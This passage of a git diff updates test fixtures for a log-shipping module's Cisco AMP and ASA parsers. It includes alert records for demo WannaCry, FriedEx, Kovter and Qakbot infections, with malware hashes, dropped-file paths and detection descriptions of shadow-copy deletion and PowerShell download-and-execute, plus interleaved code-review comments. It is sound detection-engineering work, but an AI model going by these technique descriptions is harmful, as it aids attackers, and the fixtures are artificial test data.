[ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + 
"user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T11:26:35.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6419179209167470601", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 941000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419179209167471000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "84c82835a5d21bbcf75a61706d8ab549", + "file.hash.sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 49034, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + 
"forwarded" + ] + }, + { + "@timestamp": "2021-01-14T11:26:35.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.ED01EBFBC9-100.SBX.TG", + "cisco.amp.detection_id": "6419179204872503300", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 894000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419179209167471000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "84c82835a5d21bbcf75a61706d8ab549", + "file.hash.sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\WINDOWS\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 50398, + "process.hash.md5": "db349b97c37d22f5ea1d1841e3c89eb4", + "process.hash.sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26", + "process.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "process.name": "mssecsvc.exe", + "process.pid": 3020, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + 
"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T10:59:33.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "04:e6:4d:d5:7a:b5" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.MAP.Ransomware.rewrite", + "cisco.amp.detection_id": "6583840593074454529", + "cisco.amp.event_type_id": 1090519105, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "04:e6:4d:d5:7a:b5" + ], + "cisco.amp.timestamp_nanoseconds": 231000000, + "event.action": "Malicious Activity Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6583840597369422000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "75a758a0c5cea48c9922d64a113d0f9d", + "file.hash.sha1": "c78f4c22dd195a1791472a2c271a0c85b53900d9", + "file.hash.sha256": "90b63fbdde1b1aa7295e6cbe9ab7726792f8829eb53f2327f8a9cf109054f2a0", + "file.name": "mscorsvw.exe", + "file.path": "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorsvw.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_MAP_FriedEx", + "host.name": "Demo_AMP_MAP_FriedEx", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 52012, + "process.hash.md5": "71c85477df9347fe8e7bc55768473fca", + "process.hash.sha1": "ff658a36899e43fec3966d608b4aa4472de7a378", + "process.hash.sha256": 
"a86d6a6d1f5a0efcd649792a06f3ae9b37158d48493d2eca7f52dcc1cb9b6536", + "process.name": "services.exe", + "process.pid": 480, + "related.hash": [ + "90b63fbdde1b1aa7295e6cbe9ab7726792f8829eb53f2327f8a9cf109054f2a0", + "75a758a0c5cea48c9922d64a113d0f9d", + "c78f4c22dd195a1791472a2c271a0c85b53900d9" + ], + "related.hosts": [ + "Demo_AMP_MAP_FriedEx" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T10:59:30.000Z", + "cisco.amp.cloud_ioc.description": "Shadow copies are snapshots of part of the filesystem, used for backups and restore points. Ransomware may delete these to prevent the user from restoring files that it has encrypted or destroyed. Aside from ransomware, shadow copy deletion may also be used by other types of malware to remove forensic evidence of malicious activity.", + "cisco.amp.cloud_ioc.short_description": "W32.PossibleRansomwareShadowCopyDeletion.ioc", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "04:e6:4d:d5:7a:b5" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 1107296274, + "cisco.amp.file.disposition": "Clean", + "cisco.amp.file.parent.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "04:e6:4d:d5:7a:b5" + ], + "cisco.amp.timestamp_nanoseconds": 182000000, + "event.action": "Cloud IOC", + "event.category": [ + "file" + ], + "event.dataset": "cisco.amp", + "event.id": 6701398782847286000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "event.start": "2021-01-14T10:59:30.000Z", + "file.hash.sha256": "e09bf4d27555ec7567a598ba89ccc33667252cef1fb0b604315ea7562d18ad10", + 
"file.name": "vssadmin.exe", + "file.path": "file:///C%3A/Windows/SysWOW64/vssadmin.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_MAP_FriedEx", + "host.name": "Demo_AMP_MAP_FriedEx", + "input.type": "log", + "log.offset": 53662, + "process.hash.sha256": "90b63fbdde1b1aa7295e6cbe9ab7726792f8829eb53f2327f8a9cf109054f2a0", + "related.hash": [ + "e09bf4d27555ec7567a598ba89ccc33667252cef1fb0b604315ea7562d18ad10" + ], + "related.hosts": [ + "Demo_AMP_MAP_FriedEx" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T10:55:07.000Z", + "cisco.amp.cloud_ioc.description": "PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a shell was launched with an encoded command or to use Base64 to decode or encode an existing file or command. Malware authors may use this technique to bypass antivirus tools.", + "cisco.amp.cloud_ioc.short_description": "W32.PowershellEncodedBuffer.ioc", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "04:e6:4d:d5:7a:b5" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 1107296274, + "cisco.amp.file.disposition": "Clean", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "04:e6:4d:d5:7a:b5" + ], + "cisco.amp.timestamp_nanoseconds": 260000000, + "event.action": "Cloud IOC", + "event.category": [ + "file" + ], + "event.dataset": "cisco.amp", + "event.id": 7007136036637603000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "event.start": "2021-01-14T10:55:07.000Z", + "file.hash.sha256": 
"db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386", + "file.name": "cmd.exe", + "file.path": "file:///C%3A/Windows/system32/cmd.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_MAP_FriedEx", + "host.name": "Demo_AMP_MAP_FriedEx", + "input.type": "log", + "log.offset": 55441, + "process.hash.sha256": "a86d6a6d1f5a0efcd649792a06f3ae9b37158d48493d2eca7f52dcc1cb9b6536", + "related.hash": [ + "db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386" + ], + "related.hosts": [ + "Demo_AMP_MAP_FriedEx" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T10:47:17.000Z", + "cisco.amp.cloud_ioc.description": "PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. Malware authors may use this to download items, rename them, execute and delete them with a single command.", + "cisco.amp.cloud_ioc.short_description": "W32.PowershellDownloadedExecutable.ioc", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "b6:9c:d0:89:b8:66" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 1107296274, + "cisco.amp.file.disposition": "Clean", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "b6:9c:d0:89:b8:66" + ], + "cisco.amp.timestamp_nanoseconds": 250000000, + "event.action": "Cloud IOC", + "event.category": [ + "file" + ], + "event.dataset": "cisco.amp", + "event.id": 1476905066250000100, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "event.start": 
"2021-01-14T10:47:17.000Z", + "file.hash.sha256": "8133502266008b77de7921451e1210b0ef3f0ed2db7d8d3ee0c3350d856fa6fa", + "file.name": "powershell.exe", + "file.path": "/C:/Windows/SysWoW64/WindowsPowerShell/v1.0/powershell.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Command_Line_Arguments_Kovter", + "host.name": "Demo_Command_Line_Arguments_Kovter", + "input.type": "log", + "log.offset": 57151, + "process.hash.sha256": "9d52813a48adcad9eb9df2768aaca43924d503cda2de26b27133d6e3654077ff", + "related.hash": [ + "8133502266008b77de7921451e1210b0ef3f0ed2db7d8d3ee0c3350d856fa6fa" + ], + "related.hosts": [ + "Demo_Command_Line_Arguments_Kovter" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T10:47:17.000Z", + "cisco.amp.cloud_ioc.description": "Microsoft Word launched PowerShell. This is indicative of multiple dropper variants that make use of Visual Basic Application macros to perform nefarious activities, such as downloading and executing malicious executables.", + "cisco.amp.cloud_ioc.short_description": "W32.WinWord.Powershell", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "b6:9c:d0:89:b8:66" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 1107296274, + "cisco.amp.file.disposition": "Clean", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "b6:9c:d0:89:b8:66" + ], + "cisco.amp.timestamp_nanoseconds": 228000000, + "event.action": "Cloud IOC", + "event.category": [ + "file" + ], + "event.dataset": "cisco.amp", + "event.id": 1476905066228000300, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "event.start": 
"2021-01-14T10:47:17.000Z", + "file.hash.sha256": "8133502266008b77de7921451e1210b0ef3f0ed2db7d8d3ee0c3350d856fa6fa", + "file.name": "powershell.exe", + "file.path": "/C:/Windows/SysWoW64/WindowsPowerShell/v1.0/powershell.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Command_Line_Arguments_Kovter", + "host.name": "Demo_Command_Line_Arguments_Kovter", + "input.type": "log", + "log.offset": 58928, + "process.hash.sha256": "9d52813a48adcad9eb9df2768aaca43924d503cda2de26b27133d6e3654077ff", + "related.hash": [ + "8133502266008b77de7921451e1210b0ef3f0ed2db7d8d3ee0c3350d856fa6fa" + ], + "related.hosts": [ + "Demo_Command_Line_Arguments_Kovter" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T10:33:46.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6411425813945647106", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260893, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 758000000, + "event.action": "Retrospective Quarantine Attempt Failed", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411425813945647000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "input.type": "log", + 
"log.offset": 60601, + "related.hash": [ + "12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T10:33:46.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6411425813945647105", + "cisco.amp.event_type_id": 553648155, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 758000000, + "event.action": "Retrospective Quarantine", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411425813945647000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "input.type": "log", + "log.offset": 61802, + "related.hash": [ + "12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + } +] \ No newline at end of file diff --git a/x-pack/filebeat/module/cisco/asa/_meta/fields.yml b/x-pack/filebeat/module/cisco/asa/_meta/fields.yml index b3bb3b5eb1d..f41b0383a11 100644 --- a/x-pack/filebeat/module/cisco/asa/_meta/fields.yml +++ b/x-pack/filebeat/module/cisco/asa/_meta/fields.yml 
@@ -175,3 +175,15 @@ type: keyword description: > The total count of burst rate hits since the object was created or cleared + + - name: termination_user + default_field: false + type: keyword + description: > + AAA name of user requesting termination + + - name: webvpn.group_name + type: keyword + default_field: false + description: > + The WebVPN group name the user belongs to diff --git a/x-pack/filebeat/module/cisco/asa/config/input.yml b/x-pack/filebeat/module/cisco/asa/config/input.yml index 5dadd775a99..aab360dc50d 100644 --- a/x-pack/filebeat/module/cisco/asa/config/input.yml +++ b/x-pack/filebeat/module/cisco/asa/config/input.yml @@ -23,7 +23,7 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 {{ if .external_zones }} - add_fields: diff --git a/x-pack/filebeat/module/cisco/asa/test/additional_messages.log b/x-pack/filebeat/module/cisco/asa/test/additional_messages.log index 069be4988df..e80287d4093 100644 --- a/x-pack/filebeat/module/cisco/asa/test/additional_messages.log +++ b/x-pack/filebeat/module/cisco/asa/test/additional_messages.log 
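Review bot: The two entries added at the end of this hunk order their keys differently: `default_field` comes before `type` on `termination_user` and after it on `webvpn.group_name`. Using one order for both, `type` then `default_field`, keeps the schema easy to scan. The `webvpn.group_name` description could also name the messages that fill it, since the golden output later in this diff sets it for both 716002 and 722051, e.g. `Group name reported in VPN session messages such as 716002 and 722051`. The list these entries are appended to starts outside the hunk, so their parent group is not visible here.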
@@ -64,7 +64,7 @@ Apr 27 02:03:03 dev01: %ASA-6-605005: Login permitted from 10.10.0.87/6651 to FC Apr 27 02:03:03 dev01: %ASA-6-611101: User authentication succeeded: IP address: 10.10.0.87, Uname: admin Apr 27 02:03:03 dev01: %ASA-5-713049: Group = 91.240.17.178, IP = 91.240.17.178, Security negotiation complete for LAN-to-LAN Group (91.240.17.178) Responder, Inbound SPI = 0x276b1da2, Outbound SPI = 0x0e1a581d Apr 27 02:03:03 dev01: %ASA-4-113019: Group = 91.240.17.178, Username = 91.240.17.178, IP = 91.240.17.178, Session disconnected. Session Type: LAN-to-LAN, Duration: 0h:32m:16s, Bytes xmt: 297103, Bytes rcv: 1216163, Reason: User Requested -Apr 27 02:03:03 dev01: %ASA-4-722051: Group some-policy User testuser IP 8.8.8.8 IPv4 Address 8.8.4.4 IPv6 address 2001:4860:4860::8888 assigned to session +Apr 27 02:03:03 dev01: %ASA-4-722051: Group User IP <192.168.50.3> IPv4 Address <192.168.50.5> IPv6 address <::> assigned to session Apr 27 02:03:03 dev01: %ASA-6-716002: Group another-policy User testuser IP 8.8.8.8 WebVPN session terminated: User Requested. Apr 27 02:03:03 dev01: %ASA-6-716002: Group another-policy User alice IP 192.168.50.1 WebVPN session terminated: Idle timeout. Apr 27 02:03:03 dev01: %ASA-3-710003: TCP access denied by ACL from 104.46.88.19/6370 to outside:195.74.114.34/23 diff --git a/x-pack/filebeat/module/cisco/asa/test/additional_messages.log-expected.json b/x-pack/filebeat/module/cisco/asa/test/additional_messages.log-expected.json index 2578835b3d0..7c3e3b868b1 100644 --- a/x-pack/filebeat/module/cisco/asa/test/additional_messages.log-expected.json +++ b/x-pack/filebeat/module/cisco/asa/test/additional_messages.log-expected.json @@ -45,7 +45,9 @@ ], "related.ip": [ "10.10.10.10", - "192.168.2.2" + "8.8.8.8", + "192.168.2.2", + "8.8.5.4" ], "service.type": "cisco", "source.address": "10.10.10.10", 
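Review bot: The 722051 fixture line is replaced rather than supplemented, so the earlier form without angle brackets and with a populated IPv6 address (`2001:4860:4860::8888`) is no longer exercised by this test. If devices can still emit that form, keep the removed line and add the bracketed one after it, so that a regression in either parse path shows up in the golden file. As shown here the new line has no group or user token, while the expected JSON later in this diff has `VPN5Policy` and `john`; those tokens were presumably bracketed and lost in rendering, which is worth confirming against the raw file. The new sample's IPv6 value is the unspecified address `<::>`, so IPv6 assignment is left without a meaningful test value.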
@@ -103,7 +105,9 @@ ], "related.ip": [ "10.10.10.10", - "192.168.2.2" + "8.8.8.8", + "192.168.2.2", + "8.8.5.4" ], "service.type": "cisco", "source.address": "10.10.10.10", @@ -116,6 +120,8 @@ ] }, { + "cisco.asa.icmp_code": 3, + "cisco.asa.icmp_type": 3, "cisco.asa.mapped_source_ip": "8.8.8.8", "cisco.asa.message_id": "302020", "destination.address": "10.10.10.10", @@ -151,6 +157,7 @@ ], "related.ip": [ "192.168.2.2", + "8.8.8.8", "10.10.10.10" ], "service.type": "cisco", @@ -250,6 +257,8 @@ ] }, { + "cisco.asa.icmp_code": 1, + "cisco.asa.icmp_type": 3, "cisco.asa.mapped_source_ip": "8.8.8.8", "cisco.asa.message_id": "302020", "destination.address": "10.10.10.10", @@ -285,6 +294,7 @@ ], "related.ip": [ "192.168.2.2", + "8.8.8.8", "10.10.10.10" ], "service.type": "cisco", @@ -340,7 +350,9 @@ ], "related.ip": [ "10.10.10.10", - "192.168.2.2" + "8.8.8.8", + "192.168.2.2", + "8.8.5.4" ], "service.type": "cisco", "source.address": "10.10.10.10", @@ -579,9 +591,10 @@ ] }, { + "cisco.asa.icmp_code": 0, + "cisco.asa.icmp_type": 8, "cisco.asa.mapped_source_ip": "8.8.8.8", "cisco.asa.message_id": "302021", - "cisco.asa.source_username": "type", "destination.address": "192.168.2.2", "destination.ip": "192.168.2.2", "event.action": "flow-expiration", @@ -615,6 +628,7 @@ ], "related.ip": [ "10.10.10.10", + "8.8.8.8", "192.168.2.2" ], "service.type": "cisco", @@ -749,6 +763,7 @@ ], "related.ip": [ "10.192.46.90", + "8.8.8.8", "10.10.10.10" ], "service.type": "cisco", @@ -761,6 +776,8 @@ ] }, { + "cisco.asa.icmp_code": 3, + "cisco.asa.icmp_type": 3, "cisco.asa.mapped_source_ip": "8.8.8.8", "cisco.asa.message_id": "302020", "destination.address": "10.10.10.10", @@ -796,6 +813,7 @@ ], "related.ip": [ "192.168.2.2", + "8.8.8.8", "10.10.10.10" ], "service.type": "cisco", 
@@ -826,6 +844,7 @@ "event.kind": "event", "event.module": "cisco", "event.original": "%ASA-6-302014: Teardown TCP connection 2960892904 for out111:10.10.10.10/443 to fw111:192.168.2.2/55225 duration 0:00:00 bytes 0 TCP Reset-I", + "event.reason": "TCP Reset-I", "event.severity": 6, "event.start": "2021-05-05T20:29:32.000Z", "event.timezone": "-02:00", @@ -909,6 +928,7 @@ ], "related.ip": [ "192.168.2.2", + "8.8.8.8", "10.10.10.10" ], "service.type": "cisco", @@ -1237,7 +1257,9 @@ ], "related.ip": [ "10.10.10.10", - "192.168.2.2" + "8.8.8.4", + "192.168.2.2", + "8.8.8.8" ], "service.type": "cisco", "source.address": "10.10.10.10", @@ -1295,7 +1317,9 @@ ], "related.ip": [ "10.10.10.10", - "192.168.2.2" + "8.8.8.4", + "192.168.2.2", + "8.8.8.8" ], "service.type": "cisco", "source.address": "10.10.10.10", 
@@ -1603,6 +1627,156 @@ "forwarded" ] }, + { + "cisco.asa.destination_interface": "net", + "cisco.asa.message_id": "302022", + "cisco.asa.source_interface": "fw1111", + "destination.address": "192.168.2.2", + "destination.ip": "192.168.2.2", + "destination.port": 10051, + "event.action": "firewall-rule", + "event.category": [ + "network" + ], + "event.code": 302022, + "event.dataset": "cisco.asa", + "event.kind": "event", + "event.module": "cisco", + "event.original": "%ASA-6-302022: Built director stub TCP connection for fw1111:10.10.10.10/38540 (8.8.8.5/38540) to net:192.168.2.2/10051 (8.8.8.8/10051)", + "event.severity": 6, + "event.timezone": "-02:00", + "event.type": [ + "info" + ], + "fileset.name": "asa", + "host.hostname": "dev01", + "input.type": "log", + "log.level": "informational", + "log.offset": 4472, + "network.iana_number": 6, + "network.transport": "tcp", + "observer.egress.interface.name": "fw1111", + "observer.hostname": "dev01", + "observer.ingress.interface.name": "net", + "observer.product": "asa", + "observer.type": "firewall", + "observer.vendor": "Cisco", + "related.hosts": [ + "dev01" + ], + "related.ip": [ + "10.10.10.10", + "192.168.2.2" + ], + "service.type": "cisco", + "source.address": "10.10.10.10", + "source.ip": "10.10.10.10", + "source.port": 38540, + "tags": [ + "cisco-asa", + "forwarded" + ] + }, + { + "cisco.asa.destination_interface": "net", + "cisco.asa.message_id": "302022", + "cisco.asa.source_interface": "fw111", + "destination.address": "192.168.2.2", + "destination.ip": "192.168.2.2", + "destination.port": 10051, + "event.action": "firewall-rule", + "event.category": [ + "network" + ], + "event.code": 302022, + "event.dataset": "cisco.asa", + "event.kind": "event", + "event.module": "cisco", + "event.original": "%ASA-6-302022: Built forwarder stub TCP connection for fw111:10.10.10.10/38540 (8.8.8.5/38540) to net:192.168.2.2/10051 (8.8.8.8/10051)", + "event.severity": 6, + "event.timezone": "-02:00", + "event.type": [ + 
"info" + ], + "fileset.name": "asa", + "host.hostname": "dev01", + "input.type": "log", + "log.level": "informational", + "log.offset": 4631, + "network.iana_number": 6, + "network.transport": "tcp", + "observer.egress.interface.name": "fw111", + "observer.hostname": "dev01", + "observer.ingress.interface.name": "net", + "observer.product": "asa", + "observer.type": "firewall", + "observer.vendor": "Cisco", + "related.hosts": [ + "dev01" + ], + "related.ip": [ + "10.10.10.10", + "192.168.2.2" + ], + "service.type": "cisco", + "source.address": "10.10.10.10", + "source.ip": "10.10.10.10", + "source.port": 38540, + "tags": [ + "cisco-asa", + "forwarded" + ] + }, + { + "cisco.asa.destination_interface": "net", + "cisco.asa.message_id": "302022", + "cisco.asa.source_interface": "fw111", + "destination.address": "192.1682.2.2", + "destination.domain": "192.1682.2.2", + "destination.port": 10051, + "event.action": "firewall-rule", + "event.category": [ + "network" + ], + "event.code": 302022, + "event.dataset": "cisco.asa", + "event.kind": "event", + "event.module": "cisco", + "event.original": "%ASA-6-302022: Built backup stub TCP connection for fw111:10.10.10.10/38540 (8.8.8.5/38540) to net:192.1682.2.2/10051 (8.8.8.8/10051)", + "event.severity": 6, + "event.timezone": "-02:00", + "event.type": [ + "info" + ], + "fileset.name": "asa", + "host.hostname": "dev01", + "input.type": "log", + "log.level": "informational", + "log.offset": 4791, + "network.iana_number": 6, + "network.transport": "tcp", + "observer.egress.interface.name": "fw111", + "observer.hostname": "dev01", + "observer.ingress.interface.name": "net", + "observer.product": "asa", + "observer.type": "firewall", + "observer.vendor": "Cisco", + "related.hosts": [ + "dev01", + "192.1682.2.2" + ], + "related.ip": [ + "10.10.10.10" + ], + "service.type": "cisco", + "source.address": "10.10.10.10", + "source.ip": "10.10.10.10", + "source.port": 38540, + "tags": [ + "cisco-asa", + "forwarded" + ] + }, { 
"cisco.asa.destination_interface": "net", "cisco.asa.message_id": "302023", @@ -1633,7 +1807,7 @@ "input.type": "log", "log.level": "informational", "log.offset": 4949, - "network.bytes": "0", + "network.bytes": 0, "network.iana_number": 6, "network.transport": "tcp", "observer.egress.interface.name": "fw111", @@ -1688,7 +1862,7 @@ "input.type": "log", "log.level": "informational", "log.offset": 5142, - "network.bytes": "0", + "network.bytes": 0, "network.iana_number": 6, "network.transport": "tcp", "observer.egress.interface.name": "net", @@ -2478,6 +2652,7 @@ "event.kind": "event", "event.module": "cisco", "event.original": "%ASA-6-302304: Teardown TCP state-bypass connection 2751765169 from server.deflan:1.2.3.4/54242 to server.deflan:2.3.4.5/9101 duration 1:00:02 bytes 245 Connection timeout", + "event.reason": "Connection timeout", "event.severity": 6, "event.start": "2021-04-27T05:12:21.000Z", "event.timezone": "-02:00", @@ -3061,8 +3236,9 @@ ] }, { - "cisco.asa.assigned_ip": "8.8.4.4", + "cisco.asa.assigned_ip": "192.168.50.5", "cisco.asa.message_id": "722051", + 